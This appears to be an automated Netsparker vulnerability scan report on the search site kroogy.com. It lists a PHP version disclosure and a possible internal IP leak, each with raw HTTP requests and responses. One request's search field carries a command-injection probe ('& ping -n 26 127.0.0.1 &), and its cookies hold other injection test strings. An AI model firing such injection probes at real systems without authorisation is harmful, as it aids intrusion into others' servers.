HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:34:28 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6,PleskLin Cache-Control: no-transform Vary: User-Agent,Accept,Accept-Encoding Set-Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; expires=Mon, 23-Apr-2012 12:34:29 GMT; path=/ Content-Encoding: Content-Length: 6794 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Kroogy Search - Home</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - Home"><meta name="keywords" content="Kroogy Search,search,search engine"><meta name="verify-v1" content="PfMtvMUHHRg/I3FReUjDYaCpVPX//TyFCNpEcX5oUmI=" /><meta name="google-site-verification" content="s-9hAp-e1y3Xh194fiMH_mKOz9iQuI_2HegHEPMUNcA" /><META name="y_key" content="8745226cb0eecb66"><meta name="alexaVerifyID" content="EgX0iKblGFHbJgQdSa7o1_zt_LE" /><meta name="msvalidate.01" content="D76ECAA58DEAA67C96FA2E277F200040" /><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style><style><!--/* CSS Document */ .body td, tr { font-family:Verdana, Arial, Helvetica, sans-serif; } #countries,#optionallanguage,#themegroup { background-color:#e4f2fc; height:22px; border-width:1px; border-style:solid; Border-color:#aaaaaa; } .advancedsearchsubtitletd { padding-bottom:15px; padding-top:10px; padding-left:5px; padding-right:5px; } .advancedsearchtexttd { width:250px; padding-left:5px; height:40px; padding-right:5px; } .advancedsearchfieldtd { padding-bottom:15px; } .advancedsearchtextstyle { font-size:12px; } .advancedsearchtable { width:700px; margin-top:10px; padding-top:5px; padding-bottom:15px; } .advancedsearchexampletext { font-size:12px; } .advancedsearchtitletable { width:700px; margin-top:20px; background-color:#e1e1e1; padding-top:15px; padding-bottom:15px; } .advancedsearchtitletd { padding-left:5px; height:30px; text-align:center; background-color:#e4f2fc; width:100%; border:#045c97; border-style: solid; border-width: 1px; } .advancedsearchsubtitletext { font-size:12px; font-weight:bold; } .footertable { width:100%; padding-top:15px; } .footertext { font-size:12px; } .footertd { padding-left:10px; } .headerlinkstd { width:100%; padding-right:5px; padding-left:5px; padding-top:2px; font-size:13px; padding-bottom:2px; border-bottom:#045c97; background-color: #e4f2fc; border-bottom-style: solid; border-bottom-width: 1px; } .headerlinkstd a ,.headerlinkstd a:visited { color:#000000; font-weight:bold; font-family:Verdana, Arial, Helvetica, sans-serif; font-size:11px; } .languagetd { padding-left:5px; font-size:12px; height:30px; } .headerlink { font-size:12px; } .themetd { padding-left:5px; padding-top:2px; font-size:13px; padding-bottom:2px; border-bottom:#045c97; background-color: #e4f2fc; border-bottom-style: solid; border-bottom-width: 1px; color:#000; } .cloudtagtd { margin-top:20px; padding-top:5px; padding-left:5px; border-color:#77c3fa; border-width:1px; border-style:solid; padding-bottom:5px; padding-left:5px; padding-right:5px; } .cloudtagtd a { font-family:Verdana, Arial, Helvetica, sans-serif; } .generallinks { font-size:12px; } .opendirectorytd { padding-top:10px; } .advancetd { height:20px; padding-left:5px; font-size:13px; } .footerlinktd { height:15px; border-top: #045c97; padding-top:5px; border-top-style: solid; border-top-width: 1px; } .stdpagetitle { font-size:14px; font-weight:bold; } .emailafrndurltd , .emaillinkdesctd { padding-top;5px; background-color:#e4f2fc; padding-bottom:5px; } .emailafrndurl { font-size:12px; font-weight:bold; } .outermainoptionstd { padding-left:15px; padding-right:15px; padding-top:5px; padding-bottom:5px; font-size:12px; background: url(images/themes/modern_blue/box.gif); background-position:bottom; background-repeat:repeat-x; } .outermainlogotd { width:5%; padding-top:5px; padding-bottom:5px; padding-left:15px; padding-right:15px; background: url(images/themes/modern_blue/box.gif); background-position:bottom; background-repeat:repeat-x; } .outermaintabtd { padding-top:10px; padding-bottom:5px; padding-left:0px; padding-right:0px; vertical-align:bottom; background: url(images/themes/modern_blue/box.gif); background-position:bottom; background-repeat:repeat-x; } #mandatory { color:red; font-size:10px; font-weight:bold; vertical-align:top; padding-left:2px; padding-right:2px; } #morelanguagesdiv { font-size:11px; } .advancetd a { font-size:11px; } .generatesearchboxtable { width:900px; margin-top:10px; padding-top:5px; padding-bottom:15px; } .generatesearchboxtitletd { padding-left:5px; height:30px; text-align:center; background-color:#e4f2fc; width:100%; border:#045c97; border-style: solid; border-width: 1px; } .generatesearchboxpagetitle { font-size:14px; font-weight:bold; } .generatesearchboxtexttd { padding-left:5px; height:40px; padding-right:5px; } .generatesearchboxtextstyle { font-size:12px; } .generatesearchboxsubtitletd { padding-bottom:15px; padding-top:10px; padding-left:5px; padding-right:5px; } .generatesearchboxsubtitletext { font-size:12px; font-weight:bold; } .generatesearchboxenginestextstyle { font-size:12px; text-transform: capitalize; } --></style><SCRIPT LANGUAGE="JavaScript">function setFocus(){ document.searchform.search.focus();}function urlencode(str) {return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL) {day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script></head><body onload="setFocus()"><script type="text/javascript">function getkeyword(){var key=document.getElementById("search").value;}function dropdown_visible(){document.getElementById("optionallanguagediv").style.display="";document.getElementById("morelanguagesdiv").style.display="none";}function change_language(){var lang=document.getElementById('optionallanguage').value;window.location="index.php?languageid="+lang;}function change_country(){var country=document.getElementById('countries').value;window.location="index.php?regioncode="+country;}function theme_group(){var themevalue=document.getElementById('themegroup').value;window.location="index.php?themeid="+themevalue;}</script><table align="center" style="border-style:solid;border-color:#cccccc;border-width:0px" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2" height="30px"> </td></tr><tr><td dir="ltr" style="valign-bottom;padding-bottom:5px;"><span><img src="userdata/homepagelogo.jpg" border="0"></span><span style="float:right;vertical-align: text-bottom"><select name="countries" id="countries" onChange="return change_country()"><option value="ww-ww" selected="selected" >World Wide</option><option value="XA-ar" >Arabia(Arabic)</option><option value="XA-en" >Arabia(English)</option><option value="AR-es" >Argentina</option><option value="AU-en" >Australia</option><option value="AT-de" >Austria</option><option value="BE-nl" >Belgium(Dutch)</option><option value="BE-fr" >Belgium(French)</option><option value="BR-pt" >Brazil</option><option value="BG-bg" >Bulgaria</option><option value="CA-en" >Canada(English)</option><option value="CA-fr" >Canada(French)</option><option value="CL-es" >Chile</option><option value="CN-zh" >China</option><option value="HR-hr" >Croatia</option><option value="CZ-cs" >Czech Republic</option><option value="DK-da" >Denmark</option><option value="EE-et" >Estonia</option><option value="FL-fi" >Finland</option><option value="FR-fr" >France</option><option value="DE-de" >Germany</option><option value="GR-el" >Greece</option><option value="HU-hu" >Hungary</option><option value="HK-zh" >Hong Kong SAR</option><option value="IN-en" >India</option><option value="ID-en" >Indonesia</option><option value="IE-en" >Ireland</option><option value="IL-he" >Israel</option><option value="IT-it" >Italy</option><option value="JP-ja" >Japan</option><option value="KR-ko" >korea</option><option value="XL-es" >Latin America</option><option value="LV-lv" >Latvia</option><option value="LT-lt" >Lithuania</option><option value="MY-en" >Malaysia</option><option value="MX-es" >Mexico</option><option value="NL-nl" >Netherlands</option><option value="NZ-en" >New Zealand</option><option value="NO-nl" >Norway</option><option value="PH-en" >Philippines</option><option value="PL-pl" >Poland</option><option value="PT-pt" >Portugal</option><option value="RO-ro" >Romania</option><option value="RU-ru" >Russia</option><option value="SG-en" >Singapore</option><option value="SK-sk" >Slovak Republic</option><option value="SL-sl" >Slovenia</option><option value="ZA-en" >South Africa</option><option value="ES-es" >Spain</option><option value="SE-sv" >Sweden</option><option value="CH-fr" >Switzerland(French)</option><option value="CH-de" >Switzerland (German)</option><option value="TW-zh" >Taiwan</option><option value="TH-th" >Thailand</option><option value="TR-tr" >Turkey</option><option value="UA-uk" >Ukraine</option><option value="GB-en" >United Kingdom</option><option value="US-en" >United States(English)</option><option value="US-es" >United States(Spanish)</option></select></span></td></tr><tr><td colspan="2" align="center"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; } else { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; } }}function GetXmlHttpObject(){if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari return new XMLHttpRequest(); }if (window.ActiveXObject) { // code for IE6, IE5 return new ActiveXObject("Microsoft.XMLHTTP"); }return null;}function setvaluefortb(text){ document.getElementById('search').value=text; document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.searchform.submit();}document.body.onclick= getMouseXY;function getMouseXY(e) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px";}var searchtext="";var counter=0;var old_char_count=0;var total_result_count=10;function keymovement(evt,textval) { var charCode = (evt.which) ? evt.which : event.keyCode //alert(charCode); if(charCode==40) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter+1; if(!document.getElementById('livesearch_a_'+counter)) { counter=0; } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==38) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter-1; if(!document.getElementById('livesearch_a_'+counter) && counter!=0) { for(i=total_result_count;i>0;i--) { if(document.getElementById('livesearch_a_'+i)) { counter=i; break; } } } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==37 || charCode==39 || charCode==17 || charCode==18) { } else if(charCode==27 ) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.getElementById('search').value=searchtext; } else if(charCode==13 ) { document.searchform.submit(); } else { searchtext=document.getElementById('search').value; showResult(textval); } }</script><style type="text/css">.containertabtd { padding-left:10px; background: url(images/themes/modern_blue/c2.gif) no-repeat left top; } .tabsdiv { padding-right:10px; background: url(images/themes/modern_blue/c3.gif) no-repeat right top; } .tabsdivinner { background: url(images/themes/modern_blue/menu_bg.gif) repeat-x; } .tabstable { background: url(images/themes/..
PHP Version Disclosure
PHP Version Disclosure
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.
Impact
An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
PHP/5.1.6,PleskLin
Request
GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:34:28 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6,PleskLin Cache-Control: no-transform Vary: User-Agent,Accept,Accept-Encoding Set-Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; expires=Mon, 23-Apr-2012 12:34:29 GMT; path=/ Content-Encoding: Content-Length: 6794 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Kroogy Search - Home</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - Home"><meta name="keywords" content="Kroogy Search,search,search engine"><meta name="verify-v1" content="PfMtvMUHHRg/I3FReUjDYaCpVPX//TyFCNpEcX5oUmI=" /><meta name="google-site-verification" content="s-9hAp-e1y3Xh194fiMH_mKOz9iQuI_2HegHEPMUNcA" /><META name="y_key" content="8745226cb0eecb66"><meta name="alexaVerifyID" content="EgX0iKblGFHbJgQdSa7o1_zt_LE" /><meta name="msvalidate.01" content="D76ECAA58DEAA67C96FA2E277F200040" /><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style><style><!--/* CSS Document */ .body td, tr { font-family:Verdana, Arial, Helvetica, sans-serif; } #countries,#optionallanguage,#themegroup { background-color:#e4f2fc; height:22px; border-width:1px; border-style:solid; Border-color:#aaaaaa; } .advancedsearchsubtitletd { padding-bottom:15px; padding-top:10px; padding-left:5px; padding-right:5px; } .advancedsearchtexttd { width:250px; padding-left:5px; height:40px; padding-right:5px; } .advancedsearchfieldtd { padding-bottom:15px; } .advancedsearchtextstyle { font-size:12px; } .advancedsearchtable { width:700px; margin-top:10px; padding-top:5px; padding-bottom:15px; } .advancedsearchexampletext { font-size:12px; } .advancedsearchtitletable { width:700px; margin-top:20px; background-color:#e1e1e1; padding-top:15px; padding-bottom:15px; } .advancedsearchtitletd { padding-left:5px; height:30px; text-align:center; background-color:#e4f2fc; width:100%; border:#045c97; border-style: solid; border-width: 1px; } .advancedsearchsubtitletext { font-size:12px; font-weight:bold; } .footertable { width:100%; padding-top:15px; } .footertext { font-size:12px; } .footertd { padding-left:10px; } .headerlinkstd { width:100%; padding-right:5px; padding-left:5px; padding-top:2px; font-size:13px; padding-bottom:2px; border-bottom:#045c97; background-color: #e4f2fc; border-bottom-style: solid; border-bottom-width: 1px; } .headerlinkstd a ,.headerlinkstd a:visited { color:#000000; font-weight:bold; font-family:Verdana, Arial, Helvetica, sans-serif; font-size:11px; } .languagetd { padding-left:5px; font-size:12px; height:30px; } .headerlink { font-size:12px; } .themetd { padding-left:5px; padding-top:2px; font-size:13px; padding-bottom:2px; border-bottom:#045c97; background-color: #e4f2fc; border-bottom-style: solid; border-bottom-width: 1px; color:#000; } .cloudtagtd { margin-top:20px; padding-top:5px; padding-left:5px; border-color:#77c3fa; border-width:1px; border-style:solid; padding-bottom:5px; padding-left:5px; padding-right:5px; } .cloudtagtd a { font-family:Verdana, Arial, Helvetica, sans-serif; } .generallinks { font-size:12px; } .opendirectorytd { padding-top:10px; } .advancetd { height:20px; padding-left:5px; font-size:13px; } .footerlinktd { height:15px; border-top: #045c97; padding-top:5px; border-top-style: solid; border-top-width: 1px; } .stdpagetitle { font-size:14px; font-weight:bold; } .emailafrndurltd , .emaillinkdesctd { padding-top;5px; background-color:#e4f2fc; padding-bottom:5px; } .emailafrndurl { font-size:12px; font-weight:bold; } .outermainoptionstd { padding-left:15px; padding-right:15px; padding-top:5px; padding-bottom:5px; font-size:12px; background: url(images/themes/modern_blue/box.gif); background-position:bottom; background-repeat:repeat-x; } .outermainlogotd { width:5%; padding-top:5px; padding-bottom:5px; padding-left:15px; padding-right:15px; background: url(images/themes/modern_blue/box.gif); background-position:bottom; background-repeat:repeat-x; } .outermaintabtd { padding-top:10px; padding-bottom:5px; padding-left:0px; padding-right:0px; vertical-align:bottom; background: url(images/themes/modern_blue/box.gif); background-position:bottom; background-repeat:repeat-x; } #mandatory { color:red; font-size:10px; font-weight:bold; vertical-align:top; padding-left:2px; padding-right:2px; } #morelanguagesdiv { font-size:11px; } .advancetd a { font-size:11px; } .generatesearchboxtable { width:900px; margin-top:10px; padding-top:5px; padding-bottom:15px; } .generatesearchboxtitletd { padding-left:5px; height:30px; text-align:center; background-color:#e4f2fc; width:100%; border:#045c97; border-style: solid; border-width: 1px; } .generatesearchboxpagetitle { font-size:14px; font-weight:bold; } .generatesearchboxtexttd { padding-left:5px; height:40px; padding-right:5px; } .generatesearchboxtextstyle { font-size:12px; } .generatesearchboxsubtitletd { padding-bottom:15px; padding-top:10px; padding-left:5px; padding-right:5px; } .generatesearchboxsubtitletext { font-size:12px; font-weight:bold; } .generatesearchboxenginestextstyle { font-size:12px; text-transform: capitalize; } --></style><SCRIPT LANGUAGE="JavaScript">function setFocus(){ document.searchform.search.focus();}function urlencode(str) {return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL) {day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script></head><body onload="setFocus()"><script type="text/javascript">function getkeyword(){var key=document.getElementById("search").value;}function dropdown_visible(){document.getElementById("optionallanguagediv").style.display="";document.getElementById("morelanguagesdiv").style.display="none";}function change_language(){var lang=document.getElementById('optionallanguage').value;window.location="index.php?languageid="+lang;}function change_country(){var country=document.getElementById('countries').value;window.location="index.php?regioncode="+country;}function theme_group(){var themevalue=document.getElementById('themegroup').value;window.location="index.php?themeid="+themevalue;}</script><table align="center" style="border-style:solid;border-color:#cccccc;border-width:0px" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2" height="30px"> </td></tr><tr><td dir="ltr" style="valign-bottom;padding-bottom:5px;"><span><img src="userdata/homepagelogo.jpg" border="0"></span><span style="float:right;vertical-align: text-bottom"><select name="countries" id="countries" onChange="return change_country()"><option value="ww-ww" selected="selected" >World Wide</option><option value="XA-ar" >Arabia(Arabic)</option><option value="XA-en" >Arabia(English)</option><option value="AR-es" >Argentina</option><option value="AU-en" >Australia</option><option value="AT-de" >Austria</option><option value="BE-nl" >Belgium(Dutch)</option><option value="BE-fr" >Belgium(French)</option><option value="BR-pt" >Brazil</option><option value="BG-bg" >Bulgaria</option><option value="CA-en" >Canada(English)</option><option value="CA-fr" >Canada(French)</option><option value="CL-es" >Chile</option><option value="CN-zh" >China</option><option value="HR-hr" >Croatia</option><option value="CZ-cs" >Czech Republic</option><option value="DK-da" >Denmark</option><option value="EE-et" >Estonia</option><option value="FL-fi" >Finland</option><option value="FR-fr" >France</option><option value="DE-de" >Germany</option><option value="GR-el" >Greece</option><option value="HU-hu" >Hungary</option><option value="HK-zh" >Hong Kong SAR</option><option value="IN-en" >India</option><option value="ID-en" >Indonesia</option><option value="IE-en" >Ireland</option><option value="IL-he" >Israel</option><option value="IT-it" >Italy</option><option value="JP-ja" >Japan</option><option value="KR-ko" >korea</option><option value="XL-es" >Latin America</option><option value="LV-lv" >Latvia</option><option value="LT-lt" >Lithuania</option><option value="MY-en" >Malaysia</option><option value="MX-es" >Mexico</option><option value="NL-nl" >Netherlands</option><option value="NZ-en" >New Zealand</option><option value="NO-nl" >Norway</option><option value="PH-en" >Philippines</option><option value="PL-pl" >Poland</option><option value="PT-pt" >Portugal</option><option value="RO-ro" >Romania</option><option value="RU-ru" >Russia</option><option value="SG-en" >Singapore</option><option value="SK-sk" >Slovak Republic</option><option value="SL-sl" >Slovenia</option><option value="ZA-en" >South Africa</option><option value="ES-es" >Spain</option><option value="SE-sv" >Sweden</option><option value="CH-fr" >Switzerland(French)</option><option value="CH-de" >Switzerland (German)</option><option value="TW-zh" >Taiwan</option><option value="TH-th" >Thailand</option><option value="TR-tr" >Turkey</option><option value="UA-uk" >Ukraine</option><option value="GB-en" >United Kingdom</option><option value="US-en" >United States(English)</option><option value="US-es" >United States(Spanish)</option></select></span></td></tr><tr><td colspan="2" align="center"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; } else { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; } }}function GetXmlHttpObject(){if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari return new XMLHttpRequest(); }if (window.ActiveXObject) { // code for IE6, IE5 return new ActiveXObject("Microsoft.XMLHTTP"); }return null;}function setvaluefortb(text){ document.getElementById('search').value=text; document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.searchform.submit();}document.body.onclick= getMouseXY;function getMouseXY(e) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px";}var searchtext="";var counter=0;var old_char_count=0;var total_result_count=10;function keymovement(evt,textval) { var charCode = (evt.which) ? evt.which : event.keyCode //alert(charCode); if(charCode==40) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter+1; if(!document.getElementById('livesearch_a_'+counter)) { counter=0; } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==38) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter-1; if(!document.getElementById('livesearch_a_'+counter) && counter!=0) { for(i=total_result_count;i>0;i--) { if(document.getElementById('livesearch_a_'+i)) { counter=i; break; } } } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==37 || charCode==39 || charCode==17 || charCode==18) { } else if(charCode==27 ) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.getElementById('search').value=searchtext; } else if(charCode==13 ) { document.searchform.submit(); } else { searchtext=document.getElementById('search').value; showResult(textval); } }</script><style type="text/css">.containertabtd { padding-left:10px; background: url(images/themes/modern_blue/c2.gif) no-repeat left top; } .tabsdiv { padding-right:10px; background: url(images/themes/modern_blue/c3.gif) no-repeat right top; } .tabsdivinner { background: url(images/themes/modern_blue/menu_bg.gif) repeat-x; } .tabstable { background: url(images/themes/..
[Possible] Internal IP Address Leakage
[Possible] Internal IP Address Leakage
Netsparker discovered an internal IP address in the page. It was not determined if the IP address was that of the system itself or that of an internal network.
Impact
This kind of information can be useful for an attacker when combined with other vulnerabilities.
First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this IP address was actually the real internal IP address of the target web server or internal network. If it is then consider removing it.
Parameters
Parameter
Type
Value
search
GET
'& ping -n 26 127.0.0.1 &
type
GET
web
fl
GET
0
Request
GET /search/web?search=%27%26+ping+-n+26+127.0.0.1+%26&type=web&fl=0 HTTP/1.1 Referer: http://kroogy.com/search/redir User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Cookie: language=8; region=AU-en; nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; region=%27%2BNSFTW%2B%27; PHPSESSID=totjukp6oqa5l5opadu8gndj05; language=%2A%2Fnetsparker%280x000055%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:05:46 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6,PleskLin Vary: Accept-Encoding Content-Encoding: Content-Length: 9129 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><SCRIPT LANGUAGE="JavaScript">function showcheckbox(){ if(document.getElementById('thumbshotcheck').checked==true) { SetCookie( 'thumbshot', 'on', 7); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display=""; } } else { SetCookie( 'thumbshot', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display="none"; }}}function showcheckbox1(){if(document.getElementById('quicklookcheck').checked==true) { SetCookie( 'qlook', 'on', 7); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display=""; document.getElementById("qlookframe"+i).style.display=""; } } else { SetCookie( 'qlook', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display="none"; document.getElementById("qlookframe"+i).style.display="none"; }}}</script><title>Kroogy Search - வலை - '& ping -n 26 127.0.0.1 &</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - வலை - '& ping -n 26 127.0.0.1 &"><meta name="keywords" content="Kroogy Search,search,search engine,'& ping -n 26 127.0.0.1 &,web"><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style></head><body><table cellpadding="0" cellspacing="0" border="0" class="headertable" width="100%"><tr><td class="headerlinkstd" align="right"><span style="float:left;"><form name="displaysettings" id="displaysettings" enctype="multipart/form-data" method="post" action="http://kroogy.com/"> <input type="checkbox" name="thumbshotcheck" id="thumbshotcheck" checked="checked" onchange="javascript:showcheckbox()" > பெருவிரல்சுவடை காமி <input type="checkbox" name="quicklookcheck" id="quicklookcheck" checked="checked" onchange="javascript:showcheckbox1()"> உள்பார்வை காமி </form></span><a class="headerlink" href="http://kroogy.com/index/advanced">மேம்பட்ட தேடல்</a> | <a class="headerlink" href="http://kroogy.com/">Kroogy Search முகப்பு</a></td></tr><tr><td><style><!---->.links{font-size:11px;color: grey;width: 125px;}.outermainadtd1{padding-top:10px;padding-left:0px;padding-right:10px;vertical-align:top;}.resultsetwrappertd{padding-right:50px;}</style><script src="js/qlook.js" language="JavaScript"></script><SCRIPT LANGUAGE="JavaScript">function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();}function urlencode(str){return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL){day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr> <td align="left" class="outermainlogotd" ><a alt="Kroogy Search முகப்பு" title="Kroogy Search முகப்பு" href="http://kroogy.com/"> <img 